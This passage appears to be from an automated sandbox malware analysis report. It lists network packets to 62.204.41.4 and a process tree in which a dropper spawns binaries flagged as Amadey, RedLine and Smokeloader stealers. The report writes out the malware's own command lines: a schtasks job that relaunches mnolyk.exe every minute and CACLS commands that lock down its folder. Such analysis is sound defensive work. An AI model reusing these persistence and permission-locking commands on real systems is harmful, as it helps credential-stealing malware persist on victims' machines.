                          Feb 7, 2023 20:00:51.366169930 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366204023 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366229057 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366250038 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366271019 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366292953 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366293907 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.366293907 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.366314888 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366337061 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366344929 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.366358995 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366369963 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.366384029 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366405964 CET804971962.204.41.4192.168.2.6
                          Feb 7, 2023 20:00:51.366413116 CET4971980192.168.2.662.204.41.4
                          Feb 7, 2023 20:00:51.366444111 CET4971980192.168.2.662.204.41.4
                          • 62.204.41.4

                          Click to jump to process

                          Target ID:0
                          Start time:20:00:13
                          Start date:07/02/2023
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\file.exe
                          Imagebase:0xeb0000
                          File size:537088 bytes
                          MD5 hash:16755B75334B8655BC2357553A9FDAB4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:1
                          Start time:20:00:13
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Imagebase:0x940000
                          File size:346112 bytes
                          MD5 hash:DAE3685D13248C42313D46F76E2EC968
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 54%, ReversingLabs
                          Reputation:low

                          Target ID:2
                          Start time:20:00:14
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Imagebase:0x400000
                          File size:251392 bytes
                          MD5 hash:6E870598039CCE621C7BB265AC99BB3F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 47%, ReversingLabs
                          Reputation:low

                          Target ID:3
                          Start time:20:00:26
                          Start date:07/02/2023
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Imagebase:0x7ff64d2d0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:6
                          Start time:20:00:32
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Imagebase:0xad0000
                          File size:11264 bytes
                          MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 82%, ReversingLabs
                          Reputation:moderate

                          Target ID:10
                          Start time:20:00:34
                          Start date:07/02/2023
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Imagebase:0x7ff64d2d0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:11
                          Start time:20:00:44
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Imagebase:0x1360000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 81%, ReversingLabs
                          Reputation:moderate

                          Target ID:12
                          Start time:20:00:45
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 81%, ReversingLabs
                          Reputation:moderate

                          Target ID:13
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Imagebase:0x12e0000
                          File size:185856 bytes
                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:14
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6da640000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:15
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:16
                          Start time:20:00:46
                          Start date:07/02/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6da640000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:17
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:18
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "mnolyk.exe" /P "user:N"
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:19
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:20
                          Start time:20:00:50
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:21
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:22
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Imagebase:0x920000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:23
                          Start time:20:00:51
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "..\4b9a106e76" /P "user:N"
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:24
                          Start time:20:00:52
                          Start date:07/02/2023
                          Path:C:\Windows\SysWOW64\cacls.exe
                          Wow64 process (32bit):true
                          Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                          Imagebase:0x1120000
                          File size:27648 bytes
                          MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:25
                          Start time:20:01:01
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x7ff603c50000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:28
                          Start time:20:02:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:30
                          Start time:20:03:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:31
                          Start time:20:04:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          No disassembly